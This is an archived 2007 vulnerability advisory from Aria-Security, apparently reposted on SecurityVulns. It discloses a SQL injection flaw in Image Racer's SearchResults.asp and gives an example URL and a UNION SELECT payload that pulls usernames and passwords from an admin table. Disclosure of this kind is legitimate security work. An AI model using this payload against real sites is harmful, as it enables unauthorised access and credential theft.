Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Minb Is Not A Blog default password directory

  Webspell 4.x Local File Inclusion

  PHMe CMS 0.0.2 local File Include Vulnerabilitiy

  SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS

From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net>
Date:23 июля 2007 г.
Subject:[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

__________________

Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород